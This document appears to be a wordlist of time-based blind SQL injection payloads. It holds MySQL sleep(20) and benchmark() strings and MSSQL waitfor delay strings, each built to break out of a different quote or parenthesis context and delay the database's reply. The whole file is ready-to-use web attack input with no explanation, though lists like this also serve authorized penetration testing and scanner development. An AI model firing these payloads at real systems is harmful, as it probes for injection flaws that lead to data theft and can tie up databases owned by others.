sleep(20)#
1 or sleep(20)#
" or sleep(20)#
' or sleep(20)#
" or sleep(20)="
' or sleep(20)='
1) or sleep(20)#
") or sleep(20)="
') or sleep(20)='
1)) or sleep(20)#
")) or sleep(20)="
')) or sleep(20)='
;waitfor delay '0:0:20'--
);waitfor delay '0:0:20'--
';waitfor delay '0:0:20'--
";waitfor delay '0:0:20'--
');waitfor delay '0:0:20'--
");waitfor delay '0:0:20'--
));waitfor delay '0:0:20'--
'));waitfor delay '0:0:20'--
"));waitfor delay '0:0:20'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
